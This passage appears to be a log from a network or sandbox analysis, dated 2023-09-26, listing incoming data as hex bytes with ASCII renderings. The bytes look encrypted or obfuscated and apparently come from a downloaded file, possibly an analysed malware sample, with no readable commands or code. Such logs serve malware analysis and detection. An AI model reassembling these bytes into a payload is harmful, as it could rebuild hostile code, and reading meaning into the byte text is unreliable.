2023-09-26 07:46:56 UTC	223	IN	Data Raw: 27 f5 0d 03 65 34 0d 03 e9 55 3e 9a 14 60 17 30 27 da 9c 36 27 40 a7 52 4c 48 0d 03 81 46 3a a0 86 03 3e 1d d9 14 4f 25 b6 c5 3d 28 82 53 3e 22 14 60 43 32 27 e0 f9 00 8e 71 3e 09 de 37 57 01 36 6a be a9 46 60 5a 10 22 51 34 c5 79 69 64 5c ef 02 67 87 d0 6e bb 80 a7 e0 92 74 22 89 86 6b 96 39 2f 74 2e 89 8e 70 26 6d d7 ab 37 13 3f 12 ce c0 4d 02 32 89 a6 13 54 61 27 ea b7 10 3f 34 ce eb 2e e0 26 41 d7 80 54 61 1b ea 5c 70 4d 02 0e 89 4d 70 26 4d d7 68 37 13 3f 32 ce 03 4d 02 12 89 65 13 54 61 23 ea 74 13 3f 3a ce 2b 0e 70 26 5d d7 40 56 61 4f 0f d9 17 b7 42 ce 56 1d 03 62 89 10 70 26 e9 77 ea 01 13 3f 4e ce 7e 4d 02 ae 31 d7 15 54 61 6b ea 29 13 3f 0a 7e 89 38 70 26 3d d7 fd 4e 70 4e 02 46 89 c8 70 26 05 d7 ed 37 13 3f 6a ce 86 4d 02 4a 89 e0 13 54 61 4f Data Ascii: 'e4U>`0'6'@RLHF:>O%=(S>"`C2'q>7W6jF`Z"Q4yid\gnt"k9/t.p&m7?M2Ta'?4.&ATa\pMMp&Mh7?2MeTa#t?:+p&]@VaOBVbp&w?N~M1Tak)?~8p&=NpNFp&7?jMJTaO
2023-09-26 07:46:56 UTC	239	IN	Data Raw: 6b 61 d7 7f 24 96 e7 01 63 99 3f 3b 6b 81 4a 01 25 24 27 02 1f 2c e3 77 25 4a 7a 1e a4 5c 2e 0e 58 51 f8 47 f2 10 2f 2b 96 2a b4 77 46 48 2f 32 80 e2 42 82 f2 61 4b 62 15 ba 87 63 be 20 bd 98 15 b3 f8 47 ca 51 0d 02 26 8a 61 3f 96 8a c0 fd 5b f1 36 c5 63 b1 5e 01 cd a6 6f 62 67 e1 38 c2 76 89 00 07 76 65 6a 02 e6 ea 62 c0 ad 14 f9 89 22 24 f5 c2 21 8a 8a 31 f4 52 5d c2 06 04 e4 e9 8d f4 3f 82 22 65 3e 83 25 74 bc 7f f6 61 4b 0d 25 09 3e 60 2e 2c 37 09 63 b9 60 02 af 10 39 8b 7f 63 59 8b 86 20 35 89 63 8d 2f 48 37 61 75 02 fd 72 7c 02 0c 75 7c 02 2c e0 0f 02 8d 51 3f 04 33 22 3f a8 5b 51 3f b1 16 61 c2 32 26 bd 0f 02 86 00 29 41 26 2a 0f 02 31 51 3f 0f 24 2c 23 12 2b 11 66 1e 70 ea f7 04 98 b3 ec b0 f3 42 f9 64 a3 a8 3f 55 e0 24 db ce e0 24 da 57 16 61 d9 Data Ascii: ka$c?;kJ%$',w%Jz\.XQG/+wFH/2BaKbc GQ&a?[6c^obg8vvejb"$!1R]?"e>%taK%>`.,7c`9cY 5c/H7aur\|u\|,Q?3"?[Q?a2&)A&1Q?$,#+fpBd?U$$Wa
2023-09-26 07:46:56 UTC	255	IN	Data Raw: 46 61 f3 bd c6 68 6a 62 26 e5 5f 02 62 01 3f 02 46 61 fb 94 98 81 31 62 26 5d 5f 02 d2 dc df 05 0d 00 3f 62 2e 1d df 02 0a 01 3f de 9a 4a 5f 28 46 61 6b 62 26 6d 5f 02 f6 da 84 62 2b 01 3f 6a 46 61 5d 10 c6 61 3f 62 26 c1 8f b8 65 61 5b 62 26 75 5f 02 8a 85 86 e2 7f 01 3f 56 46 61 2b 62 26 cd db ba 42 e9 df 02 7e 01 3f 3e c2 60 8d 2e c6 61 db b5 46 64 5f 02 72 01 3f b0 2e 01 3f c2 90 81 2e 62 26 4d 5f 02 8a 85 8a e2 0a 01 3f 5e 46 61 2f 32 26 04 0e 01 22 11 3f c2 92 51 3c 32 26 31 f4 32 26 50 3e 3e 56 61 cf b1 96 61 0f 02 ec 09 0f 02 0e 51 3f de 94 d1 14 32 26 f4 ce 03 ae 11 3f 46 16 61 c3 b3 d6 76 aa 32 26 0d 0f 02 02 51 3f f2 96 51 2e d7 16 61 9f 32 26 11 0f 02 02 51 3f 30 60 38 4f 02 ee ce 4f 0d 16 61 77 32 26 71 66 32 26 a5 91 f2 3b 51 3f 32 16 61 d7 Data Ascii: Fahjb&_b?Fa1b&]_?b.?J_(Fakb&m_b+?jFa]a?b&ea[b&u_?VFa+b&B~?>`.aFd_r?.?.b&M_?^Fa/2&"?Q<2&12&P>>VaaQ?2&?Fav2&Q?Q.a2&Q?0`8OOaw2&qf2&;Q?2a
2023-09-26 07:46:56 UTC	271	IN	Data Raw: 06 61 76 2d 69 41 5a 70 54 0e bb 70 1c e1 3d 08 26 61 35 43 27 56 39 03 24 6a 6f 03 26 de 3d 32 27 44 4c db 04 62 3f 0b e7 60 9f 0a 48 f1 38 a3 27 58 6e 03 55 15 1f 37 d6 0c 6c 26 47 41 27 76 52 18 4f 21 b7 2c 4f 63 55 05 4c 75 86 72 05 22 57 64 8f 66 4f 7f 59 52 5a 28 3e 03 0a 51 2b 6e 47 02 20 f0 61 f1 4b 92 39 71 a7 f3 24 0f 5a 75 a0 41 de 04 d7 61 1f 6e 43 07 8f 07 b8 12 7e 01 66 74 3f 26 26 e6 5c 76 06 2b 8b 22 26 b1 3c 6c 87 7b cc 17 53 21 70 85 f4 4d af 18 16 1f 4d 61 4e 08 4f 28 58 03 4e 07 f7 6d 0e 00 b7 60 de 04 ee 60 4c 16 08 4f cd 1b 55 01 36 51 43 15 84 80 33 13 38 76 f6 79 bf 0d 57 60 6d 74 2c bf 50 32 20 f4 36 f2 29 d1 3e 55 b6 56 ae 03 39 10 1e 83 87 11 1b e2 71 85 ba 6d 54 18 a6 b3 35 15 50 42 a3 a2 34 3f 03 91 34 11 e7 c7 ce 78 43 05 df Data Ascii: av-iAZpTp=&a5C'V9$jo&=2'DLb?`H8'XnU7l&GA'vRO!,OcULur"WdfOYRZ(>Q+nG aK9q$ZuAanC~ft?&&\v+"&<l{S!pMMaNO(XNm``LOU6QC38vyW`mt,P2 6)>UV9qmT5PB4?4xC
2023-09-26 07:46:56 UTC	287	IN	Data Raw: e2 94 f1 1f 5e 61 49 96 03 12 db 28 8d ae 3f 9e 50 2a d2 5d e4 2a 29 02 c2 2a 4f 4e 26 e8 21 fe 26 a4 46 be 6a 73 68 fc 79 61 de 1c 9a 63 62 aa d8 9a 3f 05 1e 2e 32 c4 7b f0 86 02 29 06 7a cf f0 e2 d2 e5 26 f3 32 8f 97 08 b3 4d dd 61 66 e2 05 6e ed a8 88 61 3f 7e c8 fd 7d 0c e9 f0 e8 02 01 d6 29 ec 29 a2 82 7e 26 6b 9f ec 0a 69 6a 87 04 61 87 e9 3e 7b 72 fe 0c 40 3f af 6f 50 bc 45 b3 16 4e 02 fa d0 24 49 6d 7d 2f 9e 26 16 2b c3 bb 2e 10 58 b3 61 37 2b 36 47 0e 80 03 93 3f 32 a4 44 d1 00 27 60 0f 02 a7 e2 0f 6d 17 6a 0f 0b 27 a1 17 06 20 72 3d 57 75 50 b7 17 16 72 be 03 2c 72 33 c7 14 61 1f 4b 48 02 0e 1b 16 76 2e c3 24 6a 2c 12 0b e9 0e 2c 16 03 13 43 25 62 2c 27 00 67 1b 3b 06 61 76 46 06 22 50 66 43 41 3f 51 4f 06 51 6b 48 06 1f 02 65 20 12 33 24 71 36 Data Ascii: ^aI(?P])*ON&!&Fjshyacb?.2{)z&2Mafna?~}))~&kija>{r@?oPEN$Im}/&+.Xa7+6G?2D'`mj' r=WuPr,r3aKHv.$j,,C%b,'g;avF"PfCA?QOQkHe 3$q6
2023-09-26 07:46:56 UTC	303	IN	Data Raw: 72 60 de 57 27 21 85 43 7b 35 3e c9 63 34 3e 46 21 42 33 ea 93 34 3e 4a 30 db ce 5e 92 63 a0 57 27 2d 85 8f 0e dc fe 3d 72 60 b6 57 27 31 85 52 c8 72 73 b4 32 65 4c 57 27 35 8f b8 5c ef 1a 32 8b d3 3d 5f 73 60 29 5a 85 5f 6c 03 61 34 3e 5e 9c 6a 17 36 76 4f 6b 03 17 34 3e 62 9c aa ae 60 52 64 24 57 27 05 85 03 41 35 3e 30 23 34 3e 6a 9c 50 59 56 27 8e cc 0f e2 7b cf 53 3a 51 57 a8 9c 61 1d 89 63 69 b4 4a 2e 89 3f d4 d5 9e c0 89 6b 69 b6 82 67 0d 85 fd 39 1d f6 06 8e 63 ff 07 8e 1d 85 48 2b af 36 07 22 35 95 06 72 e0 bf 02 26 61 9f b8 7f 07 6c d9 22 51 ae 07 16 23 bb 03 16 1d a4 c6 49 65 0f 7a a3 64 0f 8a 27 51 9b e6 ba 9d 3b 32 2c 3e 3a 32 aa 60 27 87 16 80 6d 53 24 79 2b ea 60 64 27 92 27 79 a2 8a 8a 3d cb 00 3e 6d d7 2f 23 79 7d 9e 27 79 49 ba d5 a0 3b Data Ascii: r`W'!C{5>c4>F!B34>J0^cW'-=r`W'1Rrs2eLW'5\2=_s`)Z_la4>^j6vOk4>b`Rd$W'A5>0#4>jPYV'{S:QWaciJ.?kig9cH+6"5r&al"Q#Iezd'Q;2,>:2`'mS$y+`d''y=>m/#y}'yI;
2023-09-26 07:46:56 UTC	319	IN	Data Raw: 24 c0 ee 57 9c 2b 32 cc 2d 7f f5 49 24 c0 1d 7a 7f 07 6c d9 6c 63 9a 49 24 c0 ad 7a 5a fa fb 6d 6c 63 bf 49 24 20 4e 5a 9c c5 db 9e da 2b 3d 59 65 2a 3d 50 5d e4 0f e3 74 29 3d 2a 2a 89 09 49 24 30 73 b8 bb cd 63 18 d2 1b 2d 13 6d 63 ee 97 9c 17 87 66 d5 a0 d5 04 ca 87 04 2c e7 75 2b ae 17 ea dd 5a 60 63 f8 49 24 e9 7e 00 7e 66 48 1b 54 e7 79 00 84 2a 3d 92 87 20 3d 11 22 79 62 48 24 1c 73 00 11 50 36 73 9e 2b 3d 5a 6d 63 8e 96 9c c6 97 73 71 2f 75 00 15 2a 3d 9a c7 67 6f c0 89 c3 92 48 24 6f 74 00 86 40 7e 00 ea f6 2f 27 6c 63 d6 e7 a5 2b 3d a3 68 db e2 f7 75 ac 75 00 20 a5 74 00 f7 30 85 fd a0 35 87 17 6c 63 a0 49 24 c1 7e 00 6d 30 18 29 74 04 79 00 5c 2a 3d 9a 67 63 8f 04 72 0b af 48 24 34 74 00 5e 20 3d 47 8e da 67 e2 6c 63 0f 49 24 e1 7e 00 76 8e f8 Data Ascii: $W+2-I$zllcI$zZmlcI$ NZ+=Ye=P]t)=I$0sc-mcf,u+Z`cI$~~fHTy= ="ybH$sP6s+=Zmcsq/u=goH$ot@~/'lc+=huu t05lcI$~m0)ty\=gcrH$4t^ =GglcI$~v
2023-09-26 07:46:56 UTC	335	IN	Data Raw: 44 61 20 16 ad 61 6e 0a d9 b3 b6 47 da e2 37 7f da 9e bf a5 00 0b 3f 8f 73 e3 14 12 26 14 33 02 53 9d 3c 10 2a d5 c0 d0 a0 64 27 82 23 e1 15 ce 20 61 2e 80 09 55 87 27 a6 4f 59 8b 63 69 db bb 72 63 3b 4f c0 db 7a 23 24 65 6a ea 9e 2c 3c 0f cc d8 2d 52 25 6c d3 b8 25 77 6a ec 9e 43 63 01 2b 91 0c cb a6 6a cd 6a 24 6b 3f a5 4c 21 b4 57 2e ea 2f 40 3a 9e ef 02 6a 09 3b 03 a7 61 a8 4f da 30 b2 57 c2 62 82 02 02 9e ee 68 3e ec 6a ce 16 33 d7 99 2c e3 77 47 38 95 86 a0 5e e2 28 f4 15 b3 ff 14 de 23 34 02 1e 89 75 10 26 61 6f 8f 32 2c cb 42 36 ad 7c 12 12 9e ee 1a a5 a5 33 82 25 a1 2a ea ac 70 12 c3 a1 9d b7 36 e4 52 17 42 2c e8 7a 30 fe 21 67 ea 58 e1 26 42 04 d8 37 8b 66 76 54 d3 24 6a 73 12 5e 61 77 a2 da 33 d7 02 3b e3 1f 01 27 6a 1b f6 ad e1 3f 4a 06 62 39 Data Ascii: Da anG7?s&3S<d'# a.U'OYcirc;Oz#$ej,<-R%l%wjCc+jj$k?L!W./@:j;aO0Wbh>j3,wG8^(#4u&ao2,B6\|3%p6RB,z0!gX&B7fvT$js^aw3;'j?Jb9
2023-09-26 07:46:56 UTC	351	IN	Data Raw: 27 66 2f b0 77 60 43 57 27 82 7a fd 04 7f d3 b3 7d 4a 49 a3 42 75 33 22 9c 55 40 c2 26 fe 3e 71 56 ae 3e c6 27 80 06 c4 2a 39 6b ba 67 f5 3f 58 e0 2b 63 94 26 3f 6b ba 62 f5 3f 62 50 63 5d 24 69 05 ea 34 27 07 c9 06 4e 42 2e 68 17 66 de c5 a7 23 a6 06 a3 a1 30 87 34 a1 29 3d 01 76 ad 10 74 00 ac 0b 74 f5 cd c8 23 4e f8 f2 62 33 19 a0 2d a9 d7 54 74 73 ea 03 e0 77 eb 03 65 27 f7 ea 1e b3 3e d7 24 98 cf 1d ce 47 4f 19 75 06 0d 36 d4 64 4b ae 55 04 3c 63 24 9e 28 62 36 21 aa f6 7f 04 94 f4 7f b4 22 3e 10 60 01 41 2b 21 3e 1f c7 43 94 22 ce 30 24 11 b4 c0 45 fa bb 84 ac 79 aa 23 38 ea eb d1 31 66 5b f1 37 e5 41 1c 2c 0b 47 1c d4 17 54 62 cb 03 64 62 d9 9a 24 73 fb 02 ad 98 9f ad 07 f0 bf 6f e1 80 e4 a0 5e 94 1c 22 ce fd 9f 35 47 cb 58 70 fd 62 83 40 34 e2 ff Data Ascii: 'f/w`CW'z}JIBu3"U@&>qV>'*9kg?X+c&?kb?bPc]$i4'NB.hf#04)=vtt#Nb3-Ttswe'>$GOu6dKU<c$(b6!">`A+!>C"0$Ey#81f[7A,GTbdb$so^"5GXpb@4
2023-09-26 07:46:56 UTC	367	IN	Data Raw: 8d 02 3c 06 25 68 3f 01 b6 4a cc 33 26 6f 07 03 28 21 6e 2e 67 3f b7 c1 ce 70 1e 0e 6e ea fb 82 ad e0 2f 0e 4e 79 69 55 67 35 eb 29 66 01 73 89 9a 45 8f 93 31 ea 9b eb 6a 41 13 8f 6e 61 67 e2 86 e2 bf 4f ad a6 77 89 f3 28 af 07 e2 82 cd 73 20 ed 1b c2 f4 68 af 7f fe fd 1b ba 17 40 9f 14 28 93 26 b2 67 61 f0 ea fb 9f c0 fd ce f5 1e 93 1d 02 74 0e 6a 91 b3 89 b2 65 1b ca 37 62 3c c3 ac ed 1b 40 ce 60 3c 89 e2 e9 73 f2 31 e8 67 6e 02 29 ef 69 d7 75 7f b2 3f 59 96 32 5d ea e8 82 26 51 ff 04 6a c1 2a 11 56 ee 8f a4 ce f5 0f 90 6a ec 63 a2 02 01 76 89 7d c1 3e 69 b6 24 5d e1 f4 7b 63 5d 78 13 7b f1 2a 2d f7 8b 66 79 0f 97 36 34 7d 0f 65 58 bf 8f 4e a0 77 83 ca 81 cd 08 26 1c 58 4e ad 83 72 89 d6 69 f9 47 ae b1 3f db 63 53 d2 03 36 f6 7b 8a 4b e6 76 89 ea 71 76 Data Ascii: <%h?J3&o(!n.g?pn/NyiUg5)fsE1jAnagOw(s h@(&gatje7b<@`<s1gn)iu?Y2]&QjVjcv}>i$]{c]x{-fy64}eXNw&XNriG?cS6{Kvqv
2023-09-26 07:46:56 UTC	383	IN	Data Raw: 73 13 63 57 a7 f5 63 32 15 97 b4 d8 6a 41 0e 82 a3 a8 4a 12 ce ce dc b7 f6 55 d6 f1 56 58 85 82 83 31 4b fd ce 45 28 68 66 57 b4 ea 76 6a 30 86 a4 a6 3e 39 1d a6 30 86 98 20 61 0a ad 54 04 b2 7d 2d 04 37 6a 60 5f 02 66 eb 57 03 66 e9 53 52 02 11 4a 10 97 6f de 00 24 91 1a 42 4f 76 ff 03 67 dd de 31 6b e4 0f f4 29 e4 f5 82 26 61 50 57 6e 69 06 37 23 f1 3e 76 6a 89 3d 44 ef b1 33 32 28 7f d7 2e 00 69 77 52 a5 ac c0 4b 06 6e 8d 12 27 ea 57 c7 cf 07 dc 04 ea 81 f9 e2 20 bc 96 62 26 14 43 53 20 1a 69 04 97 51 3e 02 cd 09 7f 86 cb 6e bb 1a ab d1 39 b8 06 49 ef 09 ea 89 c6 62 56 a8 8e 16 23 f1 3f 00 ce 02 df 06 56 65 99 86 96 61 ff 0a 52 f8 7f 0a a6 a0 3b a8 09 97 3d cb d3 63 57 f3 24 52 cf 00 e3 51 3d 5e 96 61 30 86 4e d1 03 c2 25 43 78 c1 25 6e bb 5a d6 61 76 Data Ascii: scWc2jAJUVX1KE(hfWvj0>90 aT}-7j`_fWfSRJo$BOvg1k)&aPWni7#>vj=D32(.iwRKn'W b&CS iQ>n9IbV#?VeaR;=cW$RQ=^a0N%Cx%nZav
2023-09-26 07:46:56 UTC	399	IN	Data Raw: f8 54 3f 19 e2 61 3c c3 26 62 3f 1d 49 15 1f 26 06 29 bc c6 27 6b d4 17 04 50 3d 58 7a 74 16 00 21 71 d5 13 26 33 2a 8f 58 61 61 4a 29 1f 3e 02 f5 12 ea 36 40 6e c5 2f 24 ca 3f 1f d5 6e d9 f7 cf 90 bf ff d9 9e 59 92 53 7f 3f 28 a2 6c 39 02 00 25 b4 07 19 61 bf 02 ce 7b 34 02 26 8a 77 0d 7e 7e bb 02 27 61 be 0c 2e e2 31 27 af e0 31 fe 2c e1 31 28 40 07 ba 0d 26 29 04 07 ff 1c 3f 02 52 6b 28 02 22 a1 3e 06 e8 29 34 07 a0 86 3f 06 a6 5b 51 c2 40 f1 b7 53 2e 6e 20 46 a6 76 0c c2 e3 80 bf 71 f6 55 fb e3 df 1f bf 06 2e 9a 22 c9 a6 74 fa f8 c0 92 1f c7 df ba 12 8d a7 64 c6 2d a2 4c b8 82 25 6e bb 43 24 e1 39 0a f7 8e d2 82 2e a4 30 84 c5 43 3e 83 2b ba 2a b9 a7 70 c4 5e 6a 44 7c 02 6c e1 33 37 ed e1 3c 0d 02 e5 b1 81 28 6c 92 80 06 ba 22 00 93 e0 3c e3 55 92 3e Data Ascii: T?a<&b?I&)'kP=Xzt!q&3XaaJ)>6@n/$?nYS?(l9%a{4&w~~'a.1'1,1(@&)?Rk(">)4?[Q@S.n FvqU."td-L%nC$9.0C>+p^jD\|l37<(l"<U>
2023-09-26 07:46:56 UTC	415	IN	Data Raw: 2f 4e 01 38 c7 4a dc c7 32 76 01 98 69 12 c2 a5 9d 47 01 81 a2 81 8a 8d d2 9c 02 97 2d 2c f8 99 09 42 01 11 2a 18 77 ea 55 98 02 6c 7e a7 37 be ea 7f 01 9a 6c 33 c6 eb 33 40 01 ba 17 50 66 42 31 4e 01 37 1e 05 1a 89 e9 7a 01 82 cb ea 22 aa 79 7e 01 e6 ff 48 c6 4f 6c 45 01 96 2a 43 e7 22 be 73 01 0b c5 65 ac 4a 2d 4b 01 fc 43 c7 94 54 6b 7e 01 61 77 57 26 92 2a 40 01 34 01 38 c1 7a 29 99 02 c8 3a a9 1a 8a 74 71 01 68 52 0c 42 51 b3 81 02 62 20 6b 98 bd 01 79 01 3e b5 24 d3 aa 96 67 01 ab fd 94 24 fa 7c 71 01 17 f3 34 19 f8 c4 76 01 bd c2 cf 80 ee 7f 6c 01 a1 19 09 e5 2d ad 7c 01 35 11 5b c2 df 9e 45 01 06 34 cf 5e 7c a4 72 01 9d 29 88 76 79 aa 4d 01 1f 7f f6 2a f2 cc 48 01 34 5d 50 51 a4 8c 78 01 57 20 13 36 54 54 4f 01 56 8a 1b c3 31 3a 47 01 50 84 00 f0 Data Ascii: /N8J2viG-,BwUl~7l33@PfB1N7z"y~HOlEC"seJ-KCTk~awW&@48z):tqhRBQb ky>$g$\|q4vl-\|5[E4^\|r)vyMH4]PQxW 6TTOV1:GP
2023-09-26 07:46:56 UTC	431	IN	Data Raw: 5c 05 5d 65 e7 6c 0f 0a 26 61 5f c0 23 12 4d 61 02 b5 0f 33 a7 65 5f c2 22 e1 3f 28 e2 65 21 30 59 33 00 02 19 61 06 02 27 61 27 69 66 60 ff 02 a6 ac 3a 00 a5 31 f1 07 2f b1 3b 02 26 29 fb 50 5b 60 42 0e 26 61 03 3d 5e 0c 53 22 50 04 3f 70 55 08 50 6c 1b 46 0e 02 08 51 18 22 43 0f 5c 6d 26 05 56 6c 41 5c 18 57 72 61 79 2f 1e 46 1f 71 52 00 3f 6c 42 00 53 6d 48 04 02 02 01 18 5a 71 01 5e 01 0f 26 6b 03 63 55 12 5a 6f 44 69 53 7b 06 61 37 6c 55 5c 18 02 53 13 51 38 55 02 57 67 26 0c 5e 71 0b 0c 56 61 54 61 50 71 49 07 4b 2f 45 0e 3f 6f 1c 00 4c 6f 08 17 0e 02 01 41 52 63 48 08 59 67 3e 12 4b 54 8f 6c 7f 0b 06 41 03 02 52 13 4a 71 52 28 51 64 ec 0e 9b 0b 04 dd 36 31 04 83 39 22 21 81 4c 67 45 14 4d 62 73 85 3e 22 24 71 4d 67 57 14 9f 0e 43 05 6f 02 54 08 49 Data Ascii: \]el&a_#Ma3e_"?(e!0Y3a'a'if`:1/;&)P[`B&a=^S"P?pUPlFQ"C\m&VlA\Wray/FqR?lBSmHZq^&kcUZoDiS{a7lU\SQ8UWg&^qVaTaPqIK/E?oLoARcHYg>KTlARJqR(Qd619"!LgEMbs>"$qMgWCoTI
2023-09-26 07:46:56 UTC	447	IN	Data Raw: fc 85 c8 5d 22 34 cd 52 7f 44 78 0a c6 f4 48 cd 48 86 46 0c 3c 2b a2 3e 00 9a a1 a3 40 8e 50 05 2e f0 86 cb 94 80 a7 c3 c7 2e 65 f3 d9 e3 a7 04 e0 cd ce 95 35 0d 9f 86 b7 59 20 4e 3b 64 0b ae 9d 1e 83 cf 2d ad fc 6c f4 05 b8 d9 89 da 31 c9 ae 3e 95 a6 04 7a 7c 5c a1 89 aa b3 0a ad 95 88 47 c7 e5 92 a1 cd ec 26 75 0a 22 49 53 7a ed a1 01 5d cc a2 4e 78 89 53 c7 be 04 2d ff 78 f2 c2 6b 43 9c d5 b8 e7 86 5b b1 e6 51 4d 80 5e dc 5f 63 65 53 d3 96 73 98 54 27 72 d5 e7 65 50 13 7b d6 05 ae 9d a1 b6 ef b0 df 7b 0e db e8 d3 46 a5 a8 62 17 c3 62 f2 c5 3f ec 1e a0 65 49 68 ff a3 ca 35 f1 3d 7d be 2a f9 c6 86 f5 03 0a f4 4b 62 fc 8f f5 a7 c5 c9 b1 32 a6 c4 47 8d 5e ac 24 36 3d 60 5e 4c 02 8f db 47 bb c7 96 f6 2b 9c a4 3b ef a5 3a 67 c3 f3 9a 5f 51 a3 b2 a1 a0 68 e6 Data Ascii: ]"4RDxHHF<+>@P..e5Y N;d-l1>z\|\G&u"ISz]NxS-xkC[QM^_ceSsT'reP{{Fbb?eIh5=}*Kb2G^$6=`^LG+;:g_Qh
2023-09-26 07:46:56 UTC	463	IN	Data Raw: ae 37 62 1c 71 d9 df 52 0a fe 7b 40 e5 b1 6c f3 dc f6 c2 58 65 9b 32 06 e9 fb 98 5d 1d af 06 20 07 38 db a3 ab d8 e0 2f b5 1c 95 13 fd 69 26 97 ce b7 13 dd 61 5c ba 18 3b c8 09 a4 b7 e8 22 f2 18 03 cb 45 33 f3 cc be 9a 9e 9c 19 1d 8c da ca df cf a7 10 14 c3 56 c9 95 06 5b ac 80 7a 5a 87 30 7d 1e b3 2a bc 5e 88 b5 cc dc 95 16 97 49 00 97 9f ae b5 2e ad 7f ad cf 18 57 5c c0 eb 3d 3f 30 47 42 ce 7b c3 c8 8f 09 25 02 d8 6f 43 84 80 50 48 81 a2 28 1a 5a 3e b6 4d 74 ab 58 a3 9c ae 8a 26 ab 59 73 ba 79 c8 21 f4 43 2d 41 d0 f2 4e da 38 16 e0 ea f7 79 52 54 37 9e a9 70 25 6c 8a 67 20 55 18 b3 77 3d 6a 5d 35 57 00 13 a5 4a 1a 25 21 91 66 a1 09 79 20 58 b5 4b b0 a5 16 b6 7c 6c f4 d3 52 06 b5 c5 f6 90 6b 72 5c 6c ae 3b fc 0f 59 e7 be b9 53 e9 94 d2 79 dd 0d 5f 1a 94 Data Ascii: 7bqR{@lXe2] 8/i&a\;"E3V[zZ0}*^I.W\=?0GB{%oCPH(Z>MtX&Ysy!C-AN8yRT7p%lg Uw=j]5WJ%!fy XK\|lRkr\l;YSy_
2023-09-26 07:46:56 UTC	479	IN	Data Raw: de 67 44 87 3c 54 e1 60 88 2c 9b b2 48 a4 c2 e3 73 75 e4 3d cb dc 7f 8f 3d 58 17 dd e0 d9 85 a7 1d c7 4e e7 06 96 d3 5a e0 a2 6a f5 54 45 9d 9d 2b 5d a4 4c be cf be 39 5b 01 6e 53 28 e2 52 49 f3 87 e4 32 9f 9b bb 81 0c 2f aa 33 9d 7f b9 51 40 5e 4d 93 6c 51 2e ac bc b5 6e d3 fe b1 29 96 d8 b7 08 52 a9 61 96 e4 aa cb 17 bf 16 13 c1 31 f3 fe b4 32 4f a9 30 76 83 59 94 a3 1f f5 bb 87 b6 2a 96 cb 94 bd dd 3e 60 c0 72 f7 0a f4 96 c4 9d af 8c 27 cc 81 fb 8a 7b e2 d3 d1 fd 76 f2 34 81 fe a2 85 51 89 e8 e0 39 79 8f d9 00 9f ec ce 52 c0 9a 90 24 6b 3e c7 28 52 25 03 b2 a9 13 70 12 70 34 7c bc 44 bb 5e 1b b8 ad 50 dd 5c e8 90 c1 eb ab 22 ce 1e 00 9d f2 4c 01 58 36 97 32 9f 5f 13 43 36 6f b2 d5 31 aa 5c ab 5e 06 0f 64 4f ea 21 4a 06 20 7c ec d0 d3 b4 a2 49 96 52 02 Data Ascii: gD<T`,Hsu==XNZjTE+]L9[nS(RI2/3Q@^MlQ.n)Ra12O0vY*>`r'{v4Q9yR$k>(R%pp4\|D^P\"LX62_C6o1\^dO!J \|IR
2023-09-26 07:46:56 UTC	495	IN	Data Raw: 4a a6 88 ad 44 a2 ca 46 7f 49 a4 f7 d2 2e 38 79 94 79 f1 0c ff 60 5e ca ef 76 69 fa eb 6a 16 b3 05 79 d8 26 e9 8d 07 41 9e 6e 44 b6 48 53 de 62 92 a6 30 92 22 49 80 88 46 60 a6 66 21 9b c3 4b b6 f1 f4 85 35 45 ba 22 15 ab e7 94 27 a2 6e a7 14 dd c4 c6 4f df af 84 9c 9a af 9e a4 86 28 8a 2b f9 c1 df df 2b 85 3a 19 10 87 e1 43 09 93 fb 5d 1a 8a db 6e 91 89 d7 0b c3 85 0d e9 32 ac a5 0b 45 8d 2a 36 d8 63 44 f6 1e db 9d 89 6e d4 ed 42 d2 c5 5d 1f e4 67 07 bc b9 1f ed c8 f4 48 7b 35 f7 89 eb 3a cc e4 36 60 9b 9c 5b 31 86 d6 4f 42 00 d3 3b 85 a2 2f 01 09 82 8c 88 3c 78 e2 ec 64 ce 6c ae 25 03 d2 77 a2 ad 52 4d 77 77 35 b9 98 d8 8a 61 fc da a7 69 c3 db d1 19 f8 9f dd 0e ee 0f 07 6f db 11 d0 a4 e4 d4 b1 c4 f5 b4 d6 f6 cd 24 f0 91 a1 24 04 6c 92 59 ce 03 31 d1 d4 Data Ascii: JDFI.8yy`^vijy&AnDHSb0"IF`f!K5E"'nO(++:C]n2E*6cDnB]gH{5:6`[1OB;/<xdl%wRMww5aio$$lY1
2023-09-26 07:46:56 UTC	511	IN	Data Raw: 07 6f e2 22 33 80 6e 7b 2c 3b 60 88 67 81 04 bd 7c be 84 13 a7 f0 d6 4c d2 4e c0 bf 1d f3 28 6e 5e a5 6a 77 c3 76 67 70 c2 f7 44 45 38 87 da c2 4c 61 df c5 7e 88 ca fe 69 88 bc f7 a8 64 88 0c 04 90 b8 d9 00 9f 36 53 da 23 13 3e ac 98 95 4c 9b f0 d9 8e e6 8d 07 f9 48 48 7c 0f 21 cd d1 62 11 67 45 49 49 9f 61 74 08 ad a8 33 80 22 59 a8 65 37 7a 41 c2 61 f8 40 6f 24 9b 17 88 cf 82 12 d5 5a aa 52 aa 5f 2f 3a 65 a2 6e 76 ab 05 e8 de 6b c8 2f df 9b db 56 93 5b c6 28 7c 5b 09 93 8f a0 0c b4 cc 9e 4c 16 51 3d c8 43 c2 32 fb 40 8a 21 6a 0e 12 7c 24 fc 29 86 6a ee b8 af 22 13 61 ff 86 bd 9c 2e 9d 1f 31 57 63 75 5c c1 fb dc 30 79 da c1 6d 5b 26 5a 6a 00 ef 9a 19 a7 e0 5f 7e a6 4e 67 23 77 a6 54 e7 69 67 06 9c 7b 7a 62 bc 22 33 67 ae 06 44 12 3f bb 9b de 85 7e 88 bf Data Ascii: o"3n{,;`g\|LN(n^jwvgpDE8La~id6S#>LHH\|!bgEIIat3"Ye7zAa@o$ZR_/:envk/V[(\|[LQ=C2@!j\|$)j"a.1Wcu\0ym[&Zj_~Ng#wTig{zb"3gD?~
2023-09-26 07:46:56 UTC	527	IN	Data Raw: 2f 25 26 f8 e2 f4 6c 70 9b 36 63 da 4e 10 49 0a 32 e3 6b 98 45 f2 46 b1 50 52 72 d5 7c 51 58 a0 88 5d fb 25 7d 57 16 0b c8 84 c8 5d 96 59 b0 e8 9e 3f c5 f2 2d 7e d2 f3 70 9c 8c 07 ba e1 00 32 3d 65 63 9a d9 f6 78 cd e9 db 8e cb 94 bd bd 02 e1 21 6a 25 2b 99 3d 07 dd ff a8 aa 18 02 1a b7 4a d5 62 4c 7a ac 0d 02 b3 73 43 08 2d ad 77 2a d3 18 fc fd 20 1a 1d 85 f7 ea 95 14 89 99 95 4c d7 70 de c0 f6 04 4b dd 54 c5 bd bf 28 81 f5 72 1b 1d 61 4a 5e 9c c5 28 45 44 b3 97 b8 99 c2 f9 6d 3f 28 95 49 50 d2 c7 0e fb 6c 43 b0 de 75 69 7b b2 46 26 8f 51 